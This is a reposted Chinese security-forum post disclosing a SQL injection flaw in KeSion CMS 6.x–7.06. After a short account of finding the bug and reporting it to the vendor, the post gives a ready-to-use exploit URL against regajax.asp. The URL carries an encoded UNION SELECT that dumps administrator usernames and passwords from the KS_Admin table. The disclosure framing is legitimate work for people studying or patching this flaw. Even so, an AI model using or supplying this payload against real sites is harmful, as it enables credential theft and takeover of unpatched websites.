科讯 6.x - 7.06 SQL 注射漏洞 - 脚本漏洞

admin 2021年4月3日19:40:24评论35 views字数 665阅读2分13秒阅读模式

    作者:goingta

    网站:http://www.zzfhw.com

    某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞

    点进去看  原来核心会员们又在xxoo

    我没权限看 自然是看不了了

    仔细看下图片

    暴露了存在漏洞的文件名

    于是自己也下一套下来看了下

    刚学asp 不是很精通

    后来还是成功爆出账户密码

    拿去官方测试,也还存在

    漏洞通知官方,已补。

    不敢私藏,分享一下

    非主流黑客别用来修改人家主页啊,没得前途

Exp:

http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500

文章来源于lcx.cc:科讯 6.x - 7.06 SQL 注射漏洞 - 脚本漏洞

相关推荐: 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件!

距事发已有两天有余,跟踪追查近两天,成功侦破一宗牵扯到全国多个大型医疗集团的典型恶性案件! 成功追查到“犯罪团伙”具体信息,并完全摸清楚该“犯罪团伙”具体犯罪方法、思路、以及完整方案,并保存完整证据链! 很抱歉,由于事件的特殊性,具体内情不便公开,这里就不跟大…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:40:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科讯 6.x - 7.06 SQL 注射漏洞 - 脚本漏洞http://cn-sec.com/archives/324307.html

发表评论

匿名网友 填写信息